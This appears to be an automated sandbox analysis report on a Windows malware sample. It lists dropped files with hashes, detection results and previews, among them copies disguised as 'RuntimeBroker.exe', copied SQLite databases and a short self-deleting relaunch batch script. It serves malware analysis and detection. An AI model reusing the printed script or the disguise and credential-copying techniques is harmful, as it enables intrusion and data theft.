	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.20.4.235
	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.20.4.235
	NOTIFICATION_OF_DEPENDANTS_1.vbs	Get hash	malicious	Xmrig	Browse	104.20.4.235
	CRf9KBk4ra.exe	Get hash	malicious	DCRat	Browse	104.20.4.235
	7FEGBYFBHFBJH32.exe	Get hash	malicious	44Caliber Stealer, BlackGuard, Rags Stealer	Browse	104.20.4.235
	test.doc.bin.doc	Get hash	malicious	Unknown	Browse	104.20.4.235
	web44.mp4.hta	Get hash	malicious	LummaC	Browse	104.20.4.235

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ogVinh0jhq.exe.log

Download File

Process:	C:\Users\user\Desktop\ogVinh0jhq.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1830
Entropy (8bit):	5.3661116947161815
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktJtpaqZ8
MD5:	FE86BB9E3E84E6086797C4D5A9C909F2
SHA1:	14605A3EA146BAB4EE536375A445B0214CD40A97
SHA-256:	214AB589DBBBE5EC116663F82378BBD6C50DE3F6DD30AB9CF937B9D08DEBE2C6
SHA-512:	07EB2B39DA16F130525D40A80508F8633A18491633D41E879C3A490391A6535FF538E4392DA03482D4F8935461CA032BA2B4FB022A74C508B69F395FC2A9C048
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\5c0c0fd393ef30

Download File

Process:	C:\Users\user\Desktop\ogVinh0jhq.exe
File Type:	ASCII text, with very long lines (949), with no line terminators
Category:	dropped
Size (bytes):	949
Entropy (8bit):	5.907332061722557
Encrypted:	false
SSDEEP:	24:S3fdZVGtlGSUfzBQQAvX6RyAt71XJT3O3H9EuFINoJ:S3fdqDGHfzbAv6wAV15DO3d3IU
MD5:	0AA0CA3C667EAF1FFB625FE5C4F678F1
SHA1:	E0BE0B2252FCE3977C388B26ADD13307F2B6A2B7
SHA-256:	ED841C6D957885DF24C9DFE10BDE3E1F8679C7012FA54E1DF69E5866DC517C8F
SHA-512:	982BA2818F24E3CD5CAF20002E08E13388A411B7624C6011C3322A7DE06281C32D952C95C4C95ACAC6D2D130C762EB17A50F1569F85475D54DA7C4ABC67CB741
Malicious:	false
Preview:	xazCd6aWYLVduRSMRpIOEjHv1ivda72nZ7DRyUOV59MfY50AqipQJA2NSEL4L76aSsDxNAY7bwTFXmW6rvw2SmdYFz9tJTK8DvNp1DwqJrzXrw0prONZKDHpPorYAoxHmVClZqFn8GslxFqS9TB4Fux9ohaMVYpf3rvWuOQBJkbDVg2J8YZrm3C1hC72Q2RkbMrFUUiuDAvfTuoHoRO7983Ao3zrRYuQS0mIzwyn0onlIgiwYzN8oUkdTqabe1cpPeNcIgS1dkHUUR2IUCSbKwm7QJyIWWJ8M8VnTFo1hVeDNQICxSGbiAed1PM9sJfGbIIV5OzOYb4yRju9AvVDQrZLe2wD3pJY0YmEHwGjd1DHGpLSeM86yc0ts71DcvVsRg836p2NpvjYnSEzqdjqqMjYh2VK5DHsgVzkqSWzUvRC2cGa2CW8MoBE6kVDTsSlo12SceIYHtW55hgFw5R2rJg1TunG6SfmcpYAky7X470cRGJYEQQYaZ4eVA8r1CczOucQIff8748tTEkNlOBqBGLDu3pjzQg1fANgn2QjuSbfaLLQavFmAvyHjYfPz5IrYGOS0Djt8c5sppmjrYJEK31tMF7OWAtzJuHU73aXLWnh0Fc3w6hbwEgePeFuFUW7tGj4hSmy8w3xQT3HnEcadSCFNnFcxqR0ApytghVeTscALsO5l8HB25ebDdr4NJBSeCxkfJlFs8GuzC4fZJ1yiQ8ELXpC0aQKrKgJ4nabWBS3ztmBiMfDSMtNDtZIdiPRr6Dogvkvtach8EPbvoeo5M1ebSFLOS7xwAM2q7fwltU1uLO8e8WzEkWeEiMNpZhacov82WuxIrCM2AtPDHqQ5ItLorxHuSHMM3ZGaQFINjqXiJmEz7JisQfU4jULinC0k098knzxBiCWbVneEtSxIid5YFL063jkg0xrKneLIWgKOJ3j60GzU

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\9e8d7a4ca61bd9

Download File

Process:	C:\Users\user\Desktop\ogVinh0jhq.exe
File Type:	ASCII text, with very long lines (419), with no line terminators
Category:	dropped
Size (bytes):	419
Entropy (8bit):	5.868942744195159
Encrypted:	false
SSDEEP:	12:MYc6eETgBR39t+LVOooXkB/PLDTHIRg5Rh:Mx6eRR618ILPoR0Rh
MD5:	BAD48463ECFEA661F0BC10181C7BD35F
SHA1:	B9259BF119FDFCF5DAA404BB0A5F730CB4751B6B
SHA-256:	41D455CA249A9EB21A6632CAB15E9B52CB60E9FBF32647B12D5A8ECC359C2B5D
SHA-512:	9B71651488C23201F4C151D0F2E15C31A020C3138AEEF1A845EC2091C55EBDDD250EF5409987CA4332C8B1FD30F38DBECE4924E60F3908D027FF9FE1561F5371
Malicious:	false
Preview:	QOatBRUJsOi8l99JzTsISAn0iN7YoCv1574RqM7W2bBZ6VdEc9xR1WGQkjKyT6fpdrCoFscnWVQ18N4Nt25oPe9i0nrHBID66V6OSy9ugJ4fGPRWo7EbA0a9rdybBVmNST5nRp453LIFjdckWUcDEl6F46gyAitKhqNwTnE9DJhyrUZNBNEq3iJqXztVJF4Vc7i3QpRtQdA5EHYjhSxwdDR9hgZe4t07OMWtwf7W6VZZiNmPaJx0SI1ZpjWtPwyhnCq1voxBVazIn1aT4JDv59oGV7DNJOGJg2wfguewVwe1SsvyICyFtDlnYkgxkk1HUqmuF5wKpRZJewxmLPFGZAacRJH5OqLv4XhmGBsMQoacobIlx4mVfvsTPJc6y068FnPHPLfJh20uk8xzAfITE0QIpOW6jwXasbW

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe

Download File

Process:	C:\Users\user\Desktop\ogVinh0jhq.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1453056
Entropy (8bit):	7.165635852196137
Encrypted:	false
SSDEEP:	24576:duJOV2wL/IeP69t9ovXlKr//azjjmAmE+aFEPi2l+o:duJ4LH69tkmGjjD7FE
MD5:	11233270109A3D109A5E332C13C47F86
SHA1:	37A57B1B1850AC7927F827D8748627B3007A798C
SHA-256:	757DDFAEA3C3FE1D283195F096EEBE58FB45D87359773E3A53A983D5B78A6F04
SHA-512:	5BCEE0D7BA90EC91769AD53A03ED4358EB73311BB526E5B4C40D623A0E07D80E633246FAF9B15B48BDF76963C32B26AEE11388CB840A4D3FB6EF7EB2021D06DA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`.......&..............@..@.reloc...............*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\ogVinh0jhq.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

Download File

Process:	C:\Users\user\Desktop\ogVinh0jhq.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1453056
Entropy (8bit):	7.165635852196137
Encrypted:	false
SSDEEP:	24576:duJOV2wL/IeP69t9ovXlKr//azjjmAmE+aFEPi2l+o:duJ4LH69tkmGjjD7FE
MD5:	11233270109A3D109A5E332C13C47F86
SHA1:	37A57B1B1850AC7927F827D8748627B3007A798C
SHA-256:	757DDFAEA3C3FE1D283195F096EEBE58FB45D87359773E3A53A983D5B78A6F04
SHA-512:	5BCEE0D7BA90EC91769AD53A03ED4358EB73311BB526E5B4C40D623A0E07D80E633246FAF9B15B48BDF76963C32B26AEE11388CB840A4D3FB6EF7EB2021D06DA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`.......&..............@..@.reloc...............*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\ogVinh0jhq.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:NlllulPki/llllZ:NllUcylll
MD5:	D8D47FD6FA3E199E4AFF68B91F1D04A8
SHA1:	788625E414B030E5174C5BE7262A4C93502C2C21
SHA-256:	2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738
SHA-512:	5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58
Malicious:	false
Preview:	@...e.................................^..............@..........

C:\Users\user\AppData\Local\Temp\4cKLiMk5Zo

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\5b5j5nVkAZ

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7sfxD8s4Ea

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	modified
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\B2IYoEtgGz

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DZLVMXtbhJ

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\H8JJngJgFi

Download File

Process:	C:\Users\user\Desktop\ogVinh0jhq.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.243856189774724
Encrypted:	false
SSDEEP:	3:cGkO7CC:cGkOz
MD5:	6EC9FCC086826FB9754ED6312ED58F90
SHA1:	89111AC24F2E2262BD311C63BDC3100469303BE7
SHA-256:	A9D5CE0863BE36C5A1CFB7C8146417C767C35F467D6EDA69A72C47992C97EE1A
SHA-512:	FC8A6D442AD8A9825B7318DF518A8B8ACAFAB511E72C1A1D3418A248475D4791EB6C970849A17473E6E6793798C952B06C66E9A7089738E853B96B8DFDF6DCB4
Malicious:	false
Preview:	J9PcjKF3kNqEtdPe4T0x3ggc0

C:\Users\user\AppData\Local\Temp\TJHXkWh8sx.bat

Download File

Process:	C:\Users\user\Desktop\ogVinh0jhq.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	202
Entropy (8bit):	5.101894847316589
Encrypted:	false
SSDEEP:	6:hITg3Nou11r+DE1wvKE0CHovKOZG1wkn23fyYh:OTg9YDEmafBh
MD5:	DDC6B78E6F8FE99D9BC2BB2992FD067C
SHA1:	D925D677971AC9350B867628533C3C112ECB8076
SHA-256:	80F4CAAC660035162B8A443113923AE2962AA92FFBBA3B72C73819655C7BC525
SHA-512:	1E51D5924F8EFFBDE97B4162BA3101F065BB30BBA3EB201BC6FFCD477CA2623878066FBFCB4303BE25A170EB231B8B3466417314D82E2A673ABD36E0575E94FB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Users\user\Desktop\ogVinh0jhq.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\TJHXkWh8sx.bat"

C:\Users\user\AppData\Local\Temp\TuBHNk0LqH

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_02nonyq4.2du.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_baod31dq.yas.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_blj4vial.xrv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dnbnuaib.0uw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e2vdchnv.vm1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g52l1ily.3ua.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
